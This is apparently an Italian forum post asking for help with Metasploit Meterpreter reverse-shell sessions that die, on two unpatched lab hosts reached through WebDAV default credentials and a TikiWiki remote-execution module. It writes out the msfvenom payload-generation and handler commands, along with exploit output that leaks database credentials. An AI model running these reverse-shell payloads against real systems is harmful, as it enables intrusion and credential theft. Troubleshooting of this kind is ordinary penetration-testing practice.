Usando due diversi exploit, uno è:
carica meterpreter.php al server web usando i crediti predefiniti di WebDav
e l'altro è un vuln esecuzione remota in tikiwiki.
Per il primo exploit ho creato il payload usando:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.86 LPORT=2323 -f raw > meterpreter.php
quindi ho configurato il gestore usando
use multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.86
set LPORT 2323
exploit
Vado quindi all'URL del server vuln link che mi produce il seguente output
[*] Sending stage (34776 bytes) to 192.168.1.111
[*] Meterpreter session 1 opened (192.168.1.86:4444 -> 192.168.1.111:1378) at 2017-08-22 14:05:19 +0100
[*] 192.168.1.111 - Meterpreter session 1 closed. Reason: Died
Quindi tocca il fondo. Qualcosa che ho notato è che a volte se continuo a provare ad avviare nuove sessioni cambia tra localhost e il set LHOST come:
[*] Meterpreter session 2 opened (127.0.0.1 -> 192.168.1.111:1377) at 2017-08-22 14:05:13 +0100
Il secondo esempio sembra fare la stessa cosa con output diversi che eseguo il seguente:
use unix/webapp/tikiwiki_graph_formula_exec
set RHOST 192.168.1.27
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.86
exploit
Questo emette il seguente output
[*] Started reverse TCP handler on 192.168.1.86:4444
[*] Attempting to obtain database credentials...
[*] The server returned : 200 OK
[*] Server version : Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch
[*] TikiWiki database informations :
db_tiki : mysql
dbversion : 1.9
host_tiki : localhost
user_tiki : tiki
pass_tiki : tikipassword
dbs_tiki : tikiwiki
[*] Attempting to execute our payload...
[*] Exploit completed, but no session was created.
Entrambi i server vuln sono privi di patch e vulnerabili, sembra proprio che lo stager non venga inviato correttamente da meterpreter. Il server web vuln è una macchina xp e il tikiwiki vuln è una casella di Ubuntu 8.10.
Qualsiasi aiuto sarebbe molto apprezzato.